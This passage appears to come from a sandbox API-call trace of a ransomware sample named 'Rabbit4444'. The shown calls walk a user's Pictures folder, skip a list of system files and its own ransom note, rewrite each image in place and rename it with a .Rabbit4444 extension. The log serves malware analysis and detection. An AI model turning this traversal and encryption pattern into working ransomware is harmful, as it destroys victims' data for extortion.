lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14010952650) returned 1 [0048.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0048.799] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0048.799] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.799] CloseHandle (hObject=0x298) returned 1 [0048.799] CloseHandle (hObject=0x278) returned 1 [0048.802] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\QNXsOD0CxQccs.jpg.Rabbit4444") returned 53 [0048.802] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\QNXsOD0CxQccs.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\qnxsod0cxqccs.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\QNXsOD0CxQccs.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\qnxsod0cxqccs.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.803] InterlockedExchangeAdd (in: Addend=0xff618, Value=49696 | out: Addend=0xff618) returned 18283952 [0048.803] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3426 [0048.803] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6b30110, ftCreationTime.dwHighDateTime=0x1d4cd47, ftLastAccessTime.dwLowDateTime=0xa108a720, ftLastAccessTime.dwHighDateTime=0x1d4d281, ftLastWriteTime.dwLowDateTime=0xa108a720, ftLastWriteTime.dwHighDateTime=0x1d4d281, nFileSizeHigh=0x0, nFileSizeLow=0x6cbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qwNICVapgEY_croJBzk.bmp", cAlternateFileName="QWNICV~1.BMP")) returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2=".") returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="..") returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="windows") returned -1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="bootmgr") returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="pagefile.sys") returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="boot") returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="ids.txt") returned 1 [0048.803] lstrcmpiW (lpString1="qwNICVapgEY_croJBzk.bmp", lpString2="NTUSER.DAT") returned 1 [0048.803] lstrcpyW (in: lpString1=0x130eb6a, lpString2="qwNICVapgEY_croJBzk.bmp" | out: lpString1="qwNICVapgEY_croJBzk.bmp") returned="qwNICVapgEY_croJBzk.bmp" [0048.803] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qwNICVapgEY_croJBzk.bmp", dwFileAttributes=0x0) returned 1 [0048.804] lstrlenW (lpString="qwNICVapgEY_croJBzk.bmp") returned 23 [0048.804] lstrlenW (lpString="Rabbit4444") returned 10 [0048.804] lstrcmpiW (lpString1="roJBzk.bmp", lpString2="Rabbit4444") returned 1 [0048.804] lstrlenW (lpString=".dll") returned 4 [0048.804] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.804] lstrlenW (lpString=".lnk") returned 4 [0048.804] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.804] lstrlenW (lpString=".ini") returned 4 [0048.804] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.804] lstrlenW (lpString=".sys") returned 4 [0048.804] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qwNICVapgEY_croJBzk.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\qwnicvapgey_crojbzk.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.804] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.804] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14011487596) returned 1 [0048.804] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=27836) returned 1 [0048.804] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0048.804] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0048.804] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6fc0, lpName=0x0) returned 0x298 [0048.804] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6fc0) returned 0x70000 [0048.805] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.805] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.805] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.805] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0048.805] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0048.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.806] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14011647959) returned 1 [0048.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0048.806] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0048.806] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.806] CloseHandle (hObject=0x298) returned 1 [0048.806] CloseHandle (hObject=0x278) returned 1 [0048.808] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\qwNICVapgEY_croJBzk.bmp.Rabbit4444") returned 59 [0048.808] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\qwNICVapgEY_croJBzk.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\qwnicvapgey_crojbzk.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\qwNICVapgEY_croJBzk.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\qwnicvapgey_crojbzk.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.808] InterlockedExchangeAdd (in: Addend=0xff618, Value=27840 | out: Addend=0xff618) returned 18333648 [0048.808] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3428 [0048.808] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x216c4d80, ftCreationTime.dwHighDateTime=0x1d4c7de, ftLastAccessTime.dwLowDateTime=0xcda30940, ftLastAccessTime.dwHighDateTime=0x1d4c806, ftLastWriteTime.dwLowDateTime=0xcda30940, ftLastWriteTime.dwHighDateTime=0x1d4c806, nFileSizeHigh=0x0, nFileSizeLow=0x58ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S 0Jzd8n.gif", cAlternateFileName="S0JZD8~1.GIF")) returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="Rabbit4444.exe") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2=".") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="..") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="windows") returned -1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="bootmgr") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="pagefile.sys") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="boot") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="ids.txt") returned 1 [0048.809] lstrcmpiW (lpString1="S 0Jzd8n.gif", lpString2="NTUSER.DAT") returned 1 [0048.809] lstrcpyW (in: lpString1=0x130eb6a, lpString2="S 0Jzd8n.gif" | out: lpString1="S 0Jzd8n.gif") returned="S 0Jzd8n.gif" [0048.809] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\S 0Jzd8n.gif", dwFileAttributes=0x0) returned 1 [0048.809] lstrlenW (lpString="S 0Jzd8n.gif") returned 12 [0048.809] lstrlenW (lpString="Rabbit4444") returned 10 [0048.809] lstrcmpiW (lpString1="0Jzd8n.gif", lpString2="Rabbit4444") returned -1 [0048.809] lstrlenW (lpString=".dll") returned 4 [0048.809] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.809] lstrlenW (lpString=".lnk") returned 4 [0048.809] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.809] lstrlenW (lpString=".ini") returned 4 [0048.809] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.809] lstrlenW (lpString=".sys") returned 4 [0048.809] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.809] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\S 0Jzd8n.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\s 0jzd8n.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.810] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.810] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14012030478) returned 1 [0048.810] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=22734) returned 1 [0048.810] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0048.810] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0048.810] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5bd0, lpName=0x0) returned 0x298 [0048.810] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5bd0) returned 0x70000 [0048.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0048.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0048.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0048.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0048.811] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14012219458) returned 1 [0048.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0048.812] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0048.812] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.812] CloseHandle (hObject=0x298) returned 1 [0048.812] CloseHandle (hObject=0x278) returned 1 [0048.813] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\S 0Jzd8n.gif.Rabbit4444") returned 48 [0048.813] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\S 0Jzd8n.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\s 0jzd8n.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\S 0Jzd8n.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\s 0jzd8n.gif.rabbit4444"), dwFlags=0x1) returned 1 [0048.814] InterlockedExchangeAdd (in: Addend=0xff618, Value=22736 | out: Addend=0xff618) returned 18361488 [0048.814] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3429 [0048.814] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="Rabbit4444.exe") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2=".") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="..") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="windows") returned -1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="bootmgr") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="pagefile.sys") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="boot") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="ids.txt") returned 1 [0048.814] lstrcmpiW (lpString1="Saved Pictures", lpString2="NTUSER.DAT") returned 1 [0048.814] lstrcpyW (in: lpString1=0x130eb6a, lpString2="Saved Pictures" | out: lpString1="Saved Pictures") returned="Saved Pictures" [0048.814] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", dwFileAttributes=0x10) returned 1 [0048.814] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0048.814] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x50) returned 0x10d3f8 [0048.815] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xea710 [0048.815] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4887fb50, ftCreationTime.dwHighDateTime=0x1d4c8a4, ftLastAccessTime.dwLowDateTime=0x1dde7e40, ftLastAccessTime.dwHighDateTime=0x1d4c90f, ftLastWriteTime.dwLowDateTime=0x1dde7e40, ftLastWriteTime.dwHighDateTime=0x1d4c90f, nFileSizeHigh=0x0, nFileSizeLow=0x8ef7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SEPWWo1.bmp", cAlternateFileName="")) returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="Rabbit4444.exe") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2=".") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="..") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="windows") returned -1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="bootmgr") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="pagefile.sys") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="boot") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="ids.txt") returned 1 [0048.815] lstrcmpiW (lpString1="SEPWWo1.bmp", lpString2="NTUSER.DAT") returned 1 [0048.815] lstrcpyW (in: lpString1=0x130eb6a, lpString2="SEPWWo1.bmp" | out: lpString1="SEPWWo1.bmp") returned="SEPWWo1.bmp" [0048.815] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SEPWWo1.bmp", dwFileAttributes=0x0) returned 1 [0048.815] lstrlenW (lpString="SEPWWo1.bmp") returned 11 [0048.815] lstrlenW (lpString="Rabbit4444") returned 10 [0048.815] lstrcmpiW (lpString1="EPWWo1.bmp", lpString2="Rabbit4444") returned -1 [0048.815] lstrlenW (lpString=".dll") returned 4 [0048.815] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.815] lstrlenW (lpString=".lnk") returned 4 [0048.815] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.815] lstrlenW (lpString=".ini") returned 4 [0048.815] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.815] lstrlenW (lpString=".sys") returned 4 [0048.815] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\SEPWWo1.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sepwwo1.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.815] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.815] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14012626315) returned 1 [0048.816] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=36599) returned 1 [0048.816] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0048.816] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0048.816] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9200, lpName=0x0) returned 0x298 [0048.816] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9200) returned 0x70000 [0048.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0048.817] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0048.818] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14012842044) returned 1 [0048.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0048.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0048.818] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.818] CloseHandle (hObject=0x298) returned 1 [0048.818] CloseHandle (hObject=0x278) returned 1 [0048.820] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\SEPWWo1.bmp.Rabbit4444") returned 47 [0048.820] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\SEPWWo1.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sepwwo1.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\SEPWWo1.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\sepwwo1.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.820] InterlockedExchangeAdd (in: Addend=0xff618, Value=36608 | out: Addend=0xff618) returned 18384224 [0048.820] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3430 [0048.821] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ecfd20, ftCreationTime.dwHighDateTime=0x1d4c720, ftLastAccessTime.dwLowDateTime=0xd6bda480, ftLastAccessTime.dwHighDateTime=0x1d4d428, ftLastWriteTime.dwLowDateTime=0xd6bda480, ftLastWriteTime.dwHighDateTime=0x1d4d428, nFileSizeHigh=0x0, nFileSizeLow=0x1270d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="udmWUxt.gif", cAlternateFileName="")) returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="Rabbit4444.exe") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2=".") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="..") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="windows") returned -1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="bootmgr") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="pagefile.sys") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="boot") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="ids.txt") returned 1 [0048.821] lstrcmpiW (lpString1="udmWUxt.gif", lpString2="NTUSER.DAT") returned 1 [0048.821] lstrcpyW (in: lpString1=0x130eb6a, lpString2="udmWUxt.gif" | out: lpString1="udmWUxt.gif") returned="udmWUxt.gif" [0048.821] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\udmWUxt.gif", dwFileAttributes=0x0) returned 1 [0048.821] lstrlenW (lpString="udmWUxt.gif") returned 11 [0048.821] lstrlenW (lpString="Rabbit4444") returned 10 [0048.821] lstrcmpiW (lpString1="dmWUxt.gif", lpString2="Rabbit4444") returned -1 [0048.821] lstrlenW (lpString=".dll") returned 4 [0048.821] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0048.821] lstrlenW (lpString=".lnk") returned 4 [0048.821] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0048.821] lstrlenW (lpString=".ini") returned 4 [0048.821] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0048.821] lstrlenW (lpString=".sys") returned 4 [0048.821] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0048.821] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\udmWUxt.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\udmwuxt.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.822] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.822] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14013234919) returned 1 [0048.822] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=75533) returned 1 [0048.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0048.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0048.822] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12a10, lpName=0x0) returned 0x298 [0048.822] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a10) returned 0x70000 [0048.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.824] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14013487888) returned 1 [0048.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0048.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0048.824] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.825] CloseHandle (hObject=0x298) returned 1 [0048.825] CloseHandle (hObject=0x278) returned 1 [0048.828] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\udmWUxt.gif.Rabbit4444") returned 47 [0048.828] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\udmWUxt.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\udmwuxt.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\udmWUxt.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\udmwuxt.gif.rabbit4444"), 